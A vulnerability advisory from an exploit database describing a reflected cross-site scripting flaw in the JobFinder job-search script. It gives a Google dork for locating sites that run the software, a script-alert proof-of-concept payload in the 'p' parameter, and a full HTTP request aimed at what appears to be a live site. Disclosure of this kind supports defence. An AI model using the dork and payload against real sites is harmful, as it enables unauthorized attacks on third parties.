JobFinder Cross Site Scripting

2019.02.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: JobFinder - 'jobs p' Cross-site Scripting # Google Dork: inurl:"jobs?j=Accounting" # Date: 14 Feb 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: http://www.armorthemes.com/ # Software Link: https://codecanyon.net/item/jobfinder-job-search-engine-affiliate-script/21788181 # Demo Website: http://www.armorthemes.com/demo/jobfinder/ # Version: N/A # Tested on: WIN7_x68/Linux # CVE : N/A # Description: ---------------------- JobFinder suffers from a cross site scripting vulnerability. # POC: ---------------------- 1. Access the following path http://[PATH]/jobs?p=1 2. Manipulate the parameter "p" with your own XSS payload. # Request: ---------------------- GET /jobs?p=<script>alert('XSS')</script> HTTP/1.1 Host: elsejob.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Length: 21 Connection: close


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top